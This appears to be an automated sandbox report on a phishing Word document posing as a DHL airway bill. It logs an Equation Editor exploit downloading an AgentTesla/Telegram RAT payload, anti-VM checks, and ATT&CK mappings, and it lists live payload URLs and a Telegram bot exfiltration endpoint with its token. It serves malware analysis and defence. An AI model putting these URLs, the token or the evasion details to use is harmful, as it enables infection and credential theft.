Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: DHL_AWB.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\DHL_AWB.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$HL_AWB.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR55AD.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@16/25@0/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DHL_AWB.docx	Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: DHL_AWB.docx	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\Public\vbc.exe	Code function: 10_2_00701281 pushfd ; ret	10_2_00701283
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00703B61 push ds; iretd	10_2_00703B69
Source: C:\Users\Public\vbc.exe	Code function: 10_2_007210C0 push eax; retn 0062h	10_2_007210C1

Source: vbc[1].exe.9.dr

Static PE information: 0xBA9E5D5F [Tue Mar 19 17:46:07 2069 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.827553581420892
Source: initial sample	Static PE information: section name: .text entropy: 7.827553581420892

Persistence and Installation Behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: http://198.23.207.54/shp/doc_200.doc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_036406B9

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1696	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2632	Thread sleep time: -45877s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 45877			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: EQNEDT32.EXE, 00000009.00000002.942076557.000000000098F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_03640713 mov edx, dword ptr fs:[00000030h]

9_2_03640713

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	11 Process Injection	111 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	22 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	21 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Scripting	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL_AWB.docx	23%	Virustotal		Browse
DHL_AWB.docx	29%	ReversingLabs	Document-Office.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	100%	Avira	TR/AD.AgentTesla.qwkzk
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\Public\vbc.exe	100%	Avira	TR/AD.AgentTesla.qwkzk
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	31%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\Public\vbc.exe	31%	Metadefender		Browse
C:\Users\Public\vbc.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Source	Detection	Scanner	Label
http://198.23.207.54/shp/doc_200.doc	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://198.23.207.54/200/vbc.exehhC:	0%	Avira URL Cloud	safe
http://198.23.207.54/200/vbc.exej	0%	Avira URL Cloud	safe
http://198.23.207.54/200/vbc.exe	0%	Avira URL Cloud	safe
http://198.23.207.54/shp/	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://198.23.207.54/shp/doc_200.doc	true	Avira URL Cloud: safe	unknown
http://198.23.207.54/200/vbc.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.23.207.54/200/vbc.exehhC:	EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.23.207.54/200/vbc.exej	EQNEDT32.EXE, 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.23.207.54/shp/	shp on 198.23.207.54.url.0.dr	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/	vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.23.207.54	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	679368
Start date and time: 05/08/202216:35:06	2022-08-05 16:35:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL_AWB.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
